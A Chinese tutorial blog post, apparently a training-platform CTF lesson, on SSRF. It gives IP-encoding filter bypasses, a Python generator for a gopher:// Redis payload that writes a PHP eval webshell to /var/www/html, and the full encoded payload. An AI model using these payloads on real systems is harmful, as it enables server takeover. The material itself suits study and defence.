零号培训平台课程-2、SSRF基础

原创 已于 2022-07-25 21:19:48 修改 · 1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #SSRF #redis #服务器请求伪造

于 2022-07-25 21:18:30 首次发布
该文章详细介绍了如何通过不同协议(如Dict、Gopher)结合编码转换(10进制、16进制)来绕过过滤,实现对Redis等服务器的远程操作,并给出了Python代码示例,演示了如何生成Gopher协议报文在本地Web目录下写入PHP webshell。此外,还展示了如何连接并使用这个webshell以及预期的结果,包括找到的flag。

漏洞原理:
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

协议利用
• File协议
• 本地文件传输协议
• 任意文件读取
• Dict协议
• 字典服务器协议
• 操作Redis
• Gopher协议
• 分布型的文件搜集获取网络协议。
• 支持多行
• 操作Redis、Memcached、fastcgi、mysql等
在这里插入图片描述在这里插入图片描述在这里插入图片描述

输入:
Dict://127.0.0.1:6379/info
在这里插入图片描述

本地IP地址被过滤:
绕过的方法有多种,1、把IP地址转换成10进制、16进制
在这里插入图片描述

输入:
dict://2130706433:6379/info
在这里插入图片描述

dict://0x7F000001:6379/info
在这里插入图片描述
在这里插入图片描述

Python代码生成gopher协议报文写入webshell

#/usr/bin/python

import urllib

protocol="gopher://"
# redis所在服务器的IP,10进制IP:127.0.0.1
ip="2130706433"
port="6379"
# php代码,POST方式提交、GET方式提交
shell="\n\n<?php eval($_POST[\"cmd\"]);?>\n\n"
filename="shell.php"
# web服务所在目录
path="/var/www/html"
passwd=""
cmd=["flushall",
   "set 1 {}".format(shell.replace(" ","${IFS}")),
   "config set dir {}".format(path),
   "config set dbfilename {}".format(filename),
   "save"
   ]

if passwd:
   cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"

def redis_format(arr):
   CRLF="\r\n"
   redis_arr = arr.split(" ")
   cmd=""
   cmd+="*"+str(len(redis_arr))
   for x in redis_arr:
      cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
   cmd+=CRLF
   return cmd

if __name__=="__main__":
   for x in cmd:
      payload += urllib.parse.quote(redis_format(x))
   print(payload)

在这里插入图片描述

通过gopher协议向本地127.0.0.1的web目录/var/www/html下写入一句话木马webshell:
gopher://2130706433:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5B%22cmd%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A
在这里插入图片描述

连接目标webshell
在这里插入图片描述

找到写入的shell.php和flag
在这里插入图片描述

Flag:ea56f7b7ac613b8ca0e6ebb54b66eb91

大灬白
关注
ChatGPT-Next-Web SSRF漏洞+XSS漏洞复现(CVE-2023-49785)
0xSec
03-14 2370
2024年3月,互联网上披露CVE-2023-49785 ChatGPT-Next-Web SSRF/XSS漏洞,未经身份验证的攻击者可利用此漏洞构造恶意请求获取系统内部敏感信息及配置文件,造成信息泄露。
Apache ServiceComb Service-Center SSRF漏洞复现(CVE-2023-44313)
m0_50797689的博客
02-01 550
Apache ServiceComb Service-Center SSRF漏洞复现(CVE-2023-44313)
零号培训平台课程-4、 CSRF
Onlyone_1314的博客
07-10 1226
核心知识所谓CSRF漏洞,就是通过浏览器的cookie机制,通过诱骗用户点击包含恶意Javascript代码的HTML页面,在用户不知情的情况下,触发对关键接口的调用。CSRF漏洞的利用前提是:o用户已登录网站 o网站的关键API接口没有对CSRF做防御 o用户点击访问了攻击者的网页CSRF漏洞的利用方式是:oGET请求:img标签src=属性; oPOST请求:form表单,配合Javascript代码自动提交表单CSRF漏洞的检测方式是:o检查请求中是否包含随机token内容 o修改token,检查接口
零号培训平台课程-1、SQL注入基础
Onlyone_1314的博客
07-24 838
mysql中的information_schema结构用来存储数据库系统信息information_schema结构中这几个表存储的信息,在注入中可以用到的几个表。SCHEMATA存储数据库名的,——>关键字段SCHEMA_NAME,表示数据库名称TABLES存储表名的——>关键字段TABLE_SCHEMA表示表所属的数据库名称;——>关键字段TABLE_NAME表示所属的表的名称COLUMNS存储字段名的——>关键字段COLUMN_NAME表示字段名。......
ssrf漏洞学习
2202_75317918的博客
10-21 903
(Server-Side Request Forgery,服务器请求伪造),漏洞形成的原因主要是服务器端所提供的接口中包含了所要请求内容的URL参数,并且未对客户端所传输过来的URL参数进行过滤,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。因此存在SSRF漏洞的服务器通常被作为跳板机来取得外网或内网其它应用服务器的信息。数据流:攻击者----->服务器---->目标地址根据后台使用的函数的不同,对应的影响和利用方法又有不一样。
浅谈Redis漏洞
weixin_43960884的博客
07-20 526
Redis未授权访问漏洞 Redis是一种key-value键值对的非关系型数据库 默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行未授权的访问Redis Redis还支持本地存储,也就导致任意文件写入,攻击者在未授权访...
渗透测试-SSRF漏洞总结
cdyunaq的博客
02-08 2708
漏洞介绍 SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,利用服务器端发起请求安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务器端发起的,所以服务器请求到与自身相连而外网隔离的内部系统)。 靶场推荐: https://github.com/m6a-UdS/ssrf-lab 缺陷代码参考: # 模拟SSRF,使用curl发起网络请求后返回客户端,请求加载文件 <?php $ch = curl_
java-sec-code ssrf
weixin_44687621的博客
08-21 1019
SSRF漏洞 SSRF(Server-side Request Forge, 服务端请求伪造)。 由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。 利用伪协议读取文件 由于Java没有php的cURL,所以Java SSRF支持的协议,不能像php使用curl -V查看。 Java网络请求支持的协议可通过下面几种方法检测: 代码中遍历协议 官方文档中查看 import sun.net.www.protocol查看 SSRF是由发起网络请求的方法造成。所以先整理Java能
乌云峰会猪猪侠ppt-关于SSRF
03-26
该资源是猪猪侠在2016年乌云峰会上发表演讲的PPT(已被转成PDF),内容是关于SSRF漏洞,我之前找这个找了很久,在这里分享出来,供大家参考学习,共同进步。
CTFhub--web--SSRF靶场练习
gysadsadsa的博客
03-07 608
10.这里没有任何显示,因为冒号进行了两次编码,我们将gopher后面的冒号修改回来,还有127.0.0.1:80,这里的冒号也得改回来,这样我们就可以得到flag,然后我们就可以在开启环境的那里进行提交flag2.根据提示,在url后面加上http://notfound.ctfhub.com@127.0.0.1/flag.php,即可查看flag2.根据提示在url后面跟上http://7f000001.7f000002.rbndr.us/flag.php,即可查看flag
SSRF服务器请求伪造攻击详解
m0_51468027的博客
02-07 7187
一、SSRF概述   SSRF(Server-Side Request Forgery:服务器请求伪造),是一种由攻击者构造请求,由服务端发起请求安全漏洞。   其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据   数据流:攻击者----->服务器----->目标地址   根据后台使用函数的不同,对应的影响和利用方法又有不一样   PHP中下面函数的使用不
SSRF利用协议中的万金油——Gopher
qq_57172130的博客
08-07 9868
使用gopher协议进一步利用ssrf
SSRF漏洞详解 一文了解SSRF漏洞
闵行小鱼塘
11-09 5805
本篇总结归纳SSRF漏洞
深入理解Redis的主从复制
Nuomizhende45
09-16 397
前言 主从复制,主机数据更新后根据配置和策略,自动同步到备机的master/slaver机制,Master以写为主,Slave以读为主。这样从节点就可以起到两个作用,第一就是当作主节点的数据备份,当主节点出现故障的时候从节点可以当作备用机器,并且保证数据没有丢失。第二就是从节点可以分担主节点大部分“读”这个操作的流量。 一、Redis如何建立主从复制关系 在Redis中我们的实例可以划分为主...
ctf 监听端口_SSRF 漏洞分析与利用(含 CTF 例题)
weixin_33404919的博客
01-13 1823
原标题:SSRF 漏洞分析与利用(含 CTF 例题)16004488 总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的。 一、漏洞产生以curl为例,漏洞代码为ssrf.php$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);#curl_setopt($ch, CURLOPT_FOLLOWLOC...
SSRF漏洞分析与利用
3569
11-06 7942
http://www.91ri.org/17111.html 前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的 0x01 漏洞产生 以curl为例,漏洞代码为ssrf.php Default 1234567
再探SSRF服务器请求伪造weblogic cve ssrf redis未授权)
热门推荐
Love&Share
04-26 1万+
攻击Redis 漏洞环境 复现环境使用vulhup weblogic ssrf 地址:https://vulhub.org/#/environments/weblogic/ssrf/ vulhub使用:https://vulhub.org/#/docs/run/ WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Jav
利用SSRF攻击Redis
LUOBIKUN的博客
10-20 5756
SSRF漏洞+redis前置知识实验环境搭建SSRF攻击Redis通过redis写入ssh公钥,获取操作系统权限;直接向Web目录中写webshell;linux计划任务执行命令反弹shell。 前置知识 利用SSRF来攻击靶机的redis服务,需要涉及到的一些知识点: 1,Redis客户端和服务端通信过程,以及常用命令; 2,相关协议,例如dict://协议和gother协议的使用 dict://协议 词典网络协议,在RFC 2009中进行描述。它的目标是超越Webster protocol,并允许客户端
mysql 16进制 绕过_Web中常见的绕过和技巧
weixin_39821189的博客
01-18 748
SQL注入十六进制绕过引号slect table_name from information_schema.table where table_schema="sqli";slect table_name from information_schema.table where table_schema=0x73716c69;slect table_name from information_sch...
java-sec-code ssrf靶场
最新发布
03-20
### Java 安全编码中的 SSRF 漏洞练习与测试环境 SSRF(Server-Side Request Forgery,服务器请求伪造)是一种常见的安全漏洞,攻击者可以通过该漏洞诱导应用程序向内部网络或其他外部目标发送HTTP请求。为了帮助开发者更好地理解和防范此类漏洞,在Java环境中可以使用一些专门设计的实验室或工具来模拟和实践。 #### 常见的SSRF漏洞练习平台 OWASP Juice Shop 是一个流行的开源项目,它故意包含了多种Web应用安全漏洞供学习者研究,其中包括SSRF漏洞实例[^2]。通过部署这个程序,你可以体验到真实世界中可能出现的各种攻击场景并尝试修复它们。 另一个推荐的是 DVWA (Damn Vulnerable Web Application),虽然主要面向PHP开发人员,但也提供了基础级别的SSRF挑战,适合初学者了解基本概念[^3]。 对于更专注于Java生态系统的训练资源,则有 OWASP WebGoat ,这是一个专门为教育目的而构建的应用程序,其中涵盖了多个主题的安全课程,包括但不限于SQL注入、跨站脚本(XSS)以及我们关心的SSRF等问题领域[^4]。 以下是设置这些环境的一个简单指南: ```bash # 更新系统包管理器索引 sudo apt update && sudo apt upgrade -y # 安装必要的依赖项 sudo apt install git docker-compose -y # 下载Juice Shop源码仓库 git clone https://github.com/juiceshop/juiceshop.git cd juiceshop/ # 使用Docker启动服务 docker-compose up -d ``` 上述命令展示了如何基于Linux操作系统快速搭建起OWASP Juice Shop 的运行环境。完成之后访问 `http://localhost:3000` 即可进入界面开始探索其内置的功能模块及其背后隐藏的风险点。 请注意,在实际操作过程中应当遵循合法合规的原则,仅限于授权范围内的实验活动;同时也要定期更新所使用的软件版本以获得最新的功能改进和支持。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值